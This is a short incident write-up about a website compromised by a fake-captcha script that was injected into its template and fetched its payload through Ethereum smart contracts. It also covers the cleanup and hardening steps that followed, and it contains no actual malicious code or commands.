We conducted post-breach recovery and malware analysis

A friendly group asked us for help after they saw a strange captcha on their website. They thought their site had a virus infection and needed a fix. We looked at the page HTML and scripts with our developer tools. We found base64 code in the template header that loaded a fake captcha on each page view.

On Linux, the issue appeared after running a load_() call in the dev console. On Windows, the page showed a fake captcha that led to phishing and malware links. We also saw casino ads and weird Google Play links at the bottom of every page. Because the problem showed on all subpages, we knew the base template was infected.

We removed the encoded script and all ad links from the template. Admin panel passwords were reset to strong, unique values. Plugins were updated and unused extensions deleted. The site owner was asked to review access logs for any odd entries. Sending a report to CERT was recommended for extra help.

Fun fact: the virus called two Ethereum smart contracts to fetch its JavaScript code. This blend of web hack and blockchain helped hide the payload.

Stay alert, keep your code clean, and update your plugins on time. Catch threats early and act fast to protect your site.